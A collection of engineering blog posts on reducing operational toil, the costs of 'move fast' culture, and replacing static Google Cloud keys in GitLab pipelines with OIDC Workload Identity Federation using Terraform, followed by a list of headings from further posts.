Toil isn’t a constant—it fluctuates. One quarter might be toil-heavy, while another is more focused on feature development. The key is ensuring that engineers aren’t stuck doing toil indefinitely. Google recommends keeping toil below 50% of an engineer’s time—I go even further and suggest keeping it under 33% over sustained periods. Of course, this depends on on-call schedules, incident response, and team overhead, but the goal is clear: minimize toil, or it will minimize your team’s effectiveness.

How to Reduce Toil

Identify it early. If a task is manual, repetitive, and requires intervention, label it as toil.
Automate aggressively. If a machine can do it, it should be doing it.
Prioritize fixing toil. Dedicate at least 33% of sprint time to resolving toil-related issues.
Create a structured backlog. Label toil-related tickets (e.g., KTLO – Keep The Lights On) and actively allocate resources to fix them.
Prevent new toil. Shift left—design systems that don’t introduce unnecessary toil in the first place.

At a previous job, our team made a conscious effort to tackle toil head-on. We dedicated part of every sprint to eliminating KTLO work, balancing long-term architecture improvements with reducing operational pain. Toil will never fully disappear, but by consistently addressing it, you can keep your team focused on meaningful work instead of endless firefighting.

In the end, the best way to deal with toil is to stop introducing it in the first place. It might sound like a cop-out, but good engineering prevents toil before it ever becomes a problem. Shift left, automate, and keep your engineers building—not just maintaining.

If you're interested in more of my work, feel free to check out my GitHub. It's where I keep all of the good stuff.

Rushing Toward Rewrite

RoseSecurity — Fri, 28 Mar 2025 17:31:56 +0000

This post originally appeared on rosesecurity.dev. If you like deep dives on infrastructure, Terraform, and the real cost of technical choices, follow along there too.

Introduction

This is part three of my microblog series exploring the subtle dysfunctions that plague engineering organizations. After discussing over-abstraction as a liability and unpacking how excessive toil kills engineering teams, this post tackles a nuanced threat: when “moving fast” becomes a cultural shortcut for cutting corners.

Move Fast and Don’t Break Everything

A former CEO of mine used to say: “Be fast or be perfect. And since no one’s perfect, you better be fast.” Sounds cool until that motto becomes a shield to skip due diligence, code reviews, and even basic security hygiene. Speed wasn’t a value—it was an excuse. PRs rushed. On-call flaring. Postmortems piling. And still, engineers asking for admin access “to move fast.”

Spoiler: they didn’t need it.

The deeper problem? We weren’t a scrappy startup anymore—we were operating at enterprise scale with a startup mindset. The cost of speed was technical debt, fragility, and a long tail of rework. When I transitioned to a new role (back in startup mode) I heard the same “move fast” mantra. But this time, it hit differently. Because here’s the truth: moving fast is possible without setting your future self on fire.

Here’s what I’ve learned:

1. Fail fast—but fail forward. Don’t just throw things at prod and hope they stick. Structure your failures. If a solution’s not viable, surface that early with data and a path forward. Good failure leaves breadcrumbs for the next iteration.

2. Build for iteration. Forget perfect. Aim for clear next steps. Your v1 should be designed with a roadmap in mind. Where will this evolve? What trade-offs are you making? Ship it—but know how you’ll ship it better.

3. Stay modular. Design with exits. If your observability pipeline starts with a pricey SaaS, fine. But make it swappable. Keep your vendor coupling thin so you can self-host later without a complete rewrite.

4. Be honest about scale. What worked for a team of 10 won’t work at 100. “Move fast” looks different when customers depend on your uptime. Match your velocity with the blast radius of your decisions.

We glamorize speed, but the smartest teams know when to slow down, breathe, and make thoughtful decisions that stand the test of time. Move fast—but don’t break the foundation.

Upgrading GitLab CI/CD Authentication: Migrating to OIDC for Google Cloud

RoseSecurity — Tue, 27 Feb 2024 03:34:14 +0000

The Challenge

Why should I migrate my pipelines to OIDC? I have my Service Account credentials stored securely in a CI/CD variable, and I don't plan on it going anywhere. Here's the thing, static keys present a significant risk of compromise since they remain constant over time. If these keys are compromised, an attacker could potentially manipulate the cloud environment undetected for an extended period, posing a severe threat to the security and integrity of the infrastructure and the data stored within it. Additionally, static keys lack context and are highly portable, exacerbating the security risk. Unlike dynamically generated tokens or keys tied to specific environments, static keys can be copied and used across multiple environments without any linkage to their origin. This portability makes it challenging for security teams to trace the usage of these keys and identify where they are being utilized, thereby increasing the difficulty of detecting and mitigating unauthorized access or malicious activities. Introducing OIDC!

The Benefits of OIDC

Using Google Cloud's Workload Identity Federation is the safer and recommended way to authenticate your GitLab pipelines with Google Cloud. Workload Identity Federation eliminates the need to issue static keys for authentication, removing the burden of long-term key management. With Workload Identity Federation, there is no compliance requirement to rotate secrets every few months, since temporary access tokens are issued each time! This greatly reduces the risk of leaked credentials or compromised access, since the tokens are short-lived. Overall, Workload Identity Federation provides a more secure and lower maintenance way to connect GitLab pipelines to Google Cloud resources compared to using static service account keys. The temporary tokens provide defense in depth against leaked credentials, while freeing developers from having to constantly rotate keys.

How it Works

Demonstration

Existing Infrastructure

In the following demonstration, we will showcase the infrastructure that enables secure authentication between a GitLab pipeline and Google Cloud resources. When the GitLab pipeline is triggered, Workload Identity Federation will automatically exchange the pipeline's credentials for temporary IAM access tokens to deploy into Google Cloud. The following are existing components within the CI/CD pipeline and Google Cloud:

Terraform Service Account for the pipelines

Pipeline utilizing Service Account static credentials to create infrastructure

stages:
  - validate
  - test
  - build
  - deploy
  - cleanup

before_script:
  - cat $GCP_CREDENTIALS > /tmp/gcp_credentials.json

Harnessing Google Workload Identity

The following Terraform oidc module does the following:

Workload Identity Pool Creation:
- Creates a new Google Cloud Workload Identity Pool with an ID derived from either a provided workload_identity_name or gitlab_project_id.
- Associates the pool with a Google Cloud project specified by google_project_id.
Workload Identity Provider Creation:
- Creates a new Google Cloud Workload Identity Provider inside the previously created pool (The provider's ID is derived similarly to the pool ID).
- Sets conditions for attribute mapping based on the provided parameters.
- Maps attributes from the OIDC token to attributes understood by Google Cloud IAM.
- Configures OIDC settings such as the issuer URI (gitlab_url) and allowed audiences (allowed_audiences).
Permission Granting:
- Grants permissions for Service Account impersonation by creating IAM bindings.
- For each service account specified in var.oidc_service_account, it binds the role roles/iam.workloadIdentityUser.
- Grants access to the principal set of the previously created identity pool for each service account.

Our main.tf file will look like this:

module "gitlab_oidc" {
  source = "./modules/oidc"

  google_project_id = var.google_project_id
  gitlab_project_id = var.gitlab_project_id
  oidc_service_account = {
    "sa" = {
      sa_email  = var.service_account_email
      attribute = "attribute.project_id/${var.gitlab_project_id}"
    }
  }
}

The output from a terraform apply will provide us with the needed information for migrating our existing pipelines to OIDC:

Apply complete! Resources: 3 added, 0 changed, 0 destroyed.
Outputs:
workload_identity_pool = "projects/458331852021/locations/global/workloadIdentityPools/gl-id-pool-oidc-55282716/providers/gitlab-jwt-55282716"

Making use of the CI Template provided by GitLab's infrastructure security team, we can add these variables to our pipeline to authenticate via OIDC:

include:
  - remote: 'https://gitlab.com/gitlab-com/gl-security/security-operations/infrastructure-security-public/oidc-modules/-/raw/3.1.2/templates/gcp_auth.yaml'
  - template: "Terraform/Base.gitlab-ci.yml"

variables:
  WI_POOL_PROVIDER: //iam.googleapis.com/projects/458331852021/locations/global/workloadIdentityPools/gl-id-pool-oidc-55282716/providers/gitlab-jwt-55282716
  SERVICE_ACCOUNT: terraform@oidc-demo-415417.iam.gserviceaccount.com

build:
  extends:
    - .google-oidc:auth
    - .terraform:build

deploy:
  extends:
    - .google-oidc:auth
    - .terraform:deploy

Now that we have this in place, we can create resources using OIDC:

module "compute_engine" {
  source = "./modules/compute-engine"

  instance_name = "oidc-demo-instance"
  zone          = "us-central1-a"
}

And we can see that the resource is created:

Terraform has been successfully initialized!
module.gitlab_oidc.google_iam_workload_identity_pool.gitlab_pool: Creating...
module.compute_engine.google_compute_instance.default: Creating...
module.compute_engine.google_compute_instance.default: Still creating... [10s elapsed]
module.compute_engine.google_compute_instance.default: Creation complete after 13s [id=projects/oidc-demo-415417/zones/us-central1-a/instances/oidc-demo-instance]

Conclusion

This article highlights the security and automation benefits of Workload Identity Federation for connecting GitLab pipelines to Google Cloud. By automatically exchanging pipeline identities for short-lived IAM access tokens, Workload Identity Federation removes the risks of long-term credentials while enabling access between GitLab and Google Cloud. With minimal setup, pipelines can securely deploy to Google Cloud without managing static keys. Stay safe out there!

References

How OIDC can simplify authentication of GitLab CI/CD pipelines with Google Cloud

DEV Community: RoseSecurity

Building an AWS Image Factory with Packer and Terratest

Scaffolding

AWS Prerequisites

Codebase Structure

Building the Image

Build Pipelines

Testing and Scanning AMIs

Tagging and Sharing Images

Tradeoffs and Unknowns

Wrapping Up

Welcome to Transitive Dependency Hell

Monday Night

The Hijack

The Postinstall Chain

Not Just Macs

What CrowdStrike Caught (and Didn't)

IOCs

Takeaways

Infra Proverbs

Simple, Clear, Maintainable

Terraform Drift Detection Powered by GitHub Actions

The Problem

The Simplicity of GitHub Actions

The Workflow

Triggers and Permissions

Finding Root Modules

Credential Configuration and Setup

Detecting Drift

Creating and Updating GitHub Issues

Key Benefits

Considerations for Production Use

Terraform Tips from the IaC Trenches

Use one() for Safer Conditional Resource References

The Problem

The Solution

Design Better Module Variables with Objects, optional(), and coalesce()

The Problem: Scattered Variables

The Solution: Group Related Variables into Objects

HEREDOC Syntax for Documentation

Smart Defaults with coalesce() and Context

Avoid Double Negatives in Variable Names

The Problem

The Solution

KISS vs DRY in Infrastructure as Code: Why Simple Often Beats Clever

The Scale Gap Problem

The DRY Revolution: Solving Yesterday's Problems

The Hidden Costs of Going DRY

When Abstractions Break, Troubleshooting Becomes Archaeological

The Onboarding Cliff

Ecosystem Lock-in: The Hidden Technical Debt

The KISS Alternative: Orchestration in Pipelines, Simplicity in Code

The Core Insight: Complexity Can Only Be Relocated

The Repo Structure: Nested and Navigable

Yes, Backend Configs Repeat (And That's Actually a Feature)

Orchestration Lives in Pipelines

Addressing the Objections

"But You're Repeating Backend Configurations!"

"You Don't Have Hierarchical Inheritance!"

"This Won't Scale!"

When to Use What: The Nuanced Reality

KISS Makes Sense When:

DRY Tooling Makes Sense When:

The Real Question: What's Your Actual Cost Metric?

The Anti-Pattern: Engineering for Engineering's Sake

The Minimum Viable Architecture Principle

Conclusion: Choose Boring Technology

Gang of Three: Pragmatic Operations Design Patterns

I Can't Unsee It

Where Consensus Algorithms Meet Change Management

AWS Best Practices and Chaos Engineering

Storage Hierarchies and Performance Tiers

The Practical Value of Three

I love writing useless tools... but I also believe that infrastructure-as-code deserves some more spice and flair, so I created Neofetch for Terraform! https://github.com/RoseSecurity/terrafetch

The Abstraction Debt in Infrastructure as Code

In the Early Days

Where Abstraction Becomes a Liability

How to Balance Simplicity with Over-Abstraction

Conclusion

Engineering in Quicksand

Use `one()` for Safer Conditional Resource References

Design Better Module Variables with Objects, `optional()`, and `coalesce()`

Smart Defaults with `coalesce()` and Context